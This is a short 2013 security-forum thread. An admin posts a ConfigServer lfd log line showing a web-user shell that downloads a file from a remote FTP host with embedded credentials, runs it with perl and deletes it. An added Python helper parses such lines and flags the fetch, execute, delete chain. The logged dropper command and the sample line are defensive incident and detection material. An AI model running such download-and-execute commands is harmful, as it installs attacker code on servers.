Strange "Suspicious Process" in the configserv logs

Discussion in 'Security' started by Douglas Taylor, Mar 4, 2013.

  1. Douglas Taylor

    Code:
    Mar 4 20:09:42 ip-72-167-47-182 lfd[28771]: *Suspicious Process* PID:25132 PPID:25129 User:nobody Uptime:93156 secs EXE:/bin/bash CMD:sh -c cd /tmp;wget ftp://muske:ted7862ted@85.214.65.162/.za.exe;curl -O ftp://muske:ted7862ted@85.214.65.162/.za.exe;perl .za.exe;rm -rf .za
    
    I have literally no idea who or what this is. Pointers? Thanks!
     
  2. Zepplin

  3. quietFinn

    Actually they are trying to download it, then execute it, and after that delete it, so there is nothing left to find :(
     
  4. Douglas Taylor

    I did chmod 700 on wget and am turning on mod_security in Apache, and we'll see if that helps any.
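
Added example, not part of the thread and not ConfigServer's code: a triage helper that parses lfd "Suspicious Process" lines in the format quoted in the first post and flags the download, execute, delete sequence described in the replies. The tool lists, the `triage` function and the sample line (documentation address 192.0.2.10, placeholder credentials) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Field layout follows the lfd line quoted in the first post.
LFD_RE = re.compile(
    r"lfd\[\d+\]: \*Suspicious Process\* PID:(?P<pid>\d+) PPID:(?P<ppid>\d+) "
    r"User:(?P<user>\S+) Uptime:(?P<uptime>\d+) secs EXE:(?P<exe>\S+) CMD:(?P<cmd>.*)$"
)
URL_RE = re.compile(r"\b(?:ftp|https?)://[^\s;'\"]+")
FETCHERS = {"wget", "curl", "fetch", "lwp-download"}      # assumed tool list
INTERPRETERS = {"perl", "python", "php", "sh", "bash"}    # assumed tool list
# Constructed sample line, same shape as the one in the thread.
SAMPLE = (
    "Mar 4 20:09:42 host lfd[1111]: *Suspicious Process* PID:2222 PPID:2221 "
    "User:nobody Uptime:93156 secs EXE:/bin/bash "
    "CMD:sh -c cd /tmp;wget ftp://user:pass@192.0.2.10/.x;perl .x;rm -rf .x"
)


def triage(line):
    """Parse one lfd 'Suspicious Process' line; return None for any other line."""
    m = LFD_RE.search(line)
    if not m:
        return None
    rec = dict(m.groupdict(), workdir=None)
    cmd = rec["cmd"]
    if cmd.startswith("sh -c "):          # unwrap the shell wrapper
        cmd = cmd[len("sh -c "):]
    stages = []
    for part in re.split(r";|&&|\|\|", cmd):
        argv = part.split()
        tool = argv[0].rsplit("/", 1)[-1] if argv else ""
        if tool in FETCHERS:
            stages.append("fetch")
        elif tool in INTERPRETERS:
            stages.append("execute")
        elif tool == "rm":
            stages.append("delete")
        elif tool == "cd" and len(argv) > 1:
            rec["workdir"] = argv[1]
    urls = [urlsplit(u) for u in URL_RE.findall(cmd)]
    rec["hosts"] = sorted({u.hostname for u in urls if u.hostname})
    rec["creds_in_url"] = any(u.username for u in urls)
    rec["stages"] = stages
    # True when fetch, execute and delete occur in that order (gaps allowed).
    it = iter(stages)
    rec["dropper_chain"] = all(s in it for s in ("fetch", "execute", "delete"))
    return rec
```

Because the payload is deleted after it runs, the fields worth keeping from a hit are the PID and PPID (to trace which web process spawned the shell), the working directory and the remote hosts, which can be matched against Apache access logs and outbound firewall logs for the same timestamp.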
     